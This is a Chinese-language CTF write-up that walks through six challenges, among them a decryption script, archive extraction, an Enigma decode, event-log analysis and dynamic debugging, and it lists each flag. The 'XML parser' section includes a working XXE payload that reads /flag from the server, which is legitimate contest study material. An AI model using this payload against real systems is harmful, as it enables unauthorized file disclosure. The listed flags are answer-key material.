黑客密室逃脱

找到字符串d9d1c4d9e0aac2ccc8b162656c5eac9796ab92a88f9e9ba694686692a0999ad5c8dac5a097df696898ae

爆破得name=app.py获得加密函数

image-20250426111411507

访问name=hidden.txt获得密钥secret_key2031,通过python脚本获得flag

import binascii

def decrypt(encrypted_str, secret_key):
key_ascii = [ord(c) for c in secret_key]
binary_data = binascii.unhexlify(encrypted_str)
byte_list = list(binary_data)
plaintext = bytearray()
for i in range(len(byte_list)):
decrypted_byte = byte_list[i] - key_ascii[i % len(key_ascii)]
plaintext.append(decrypted_byte)
return plaintext.decode('latin-1')

if __name__ == "__main__":
encryption_key = "secret_key2031"
encrypted_sensitive_info = "d9d1c4d9e0aac2ccc8b162656c5eac9796ab92a88f9e9ba694686692a0999ad5c8dac5a097df696898ae"
plain_text = decrypt(encrypted_sensitive_info, encryption_key)
print(plain_text)

image-20250426112105912

flag{6cac8059-9239-4036-b83a-47ccff52f78e}

flowzip

提取并解压所有压缩包,然后通过文件查找获得flag文件

image-20250426095241801

flag{c6db63e6-6459-4e75-bb37-3aec5d2b947b}

Enigma

重新进行一次编码获得原始数据

image-20250426095418297

flag{HELLOCTFERTHISISAMESSAGEFORYOU}

ezEvtx

找到警告文件即为敏感文件

image-20250426102443484

flag{confidential.docx}

星际XML解析器

看名字推测是xxe漏洞,直接读flag

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root[
<!ENTITY xxe SYSTEM "file:///flag">
]>
<root>
<data>&xxe;</data>
</root>

image-20250426120034906

flag{f3af2b65-b3c8-4bd7-bdb8-64c069382be8}

ShadowPhases

三段动态调试获得flag

image-20250426130938451

image-20250426131026367

image-20250426131045825

image-20250426131053332

flag{0fa830e7-b699-4513-8e01-51f35b0f3293}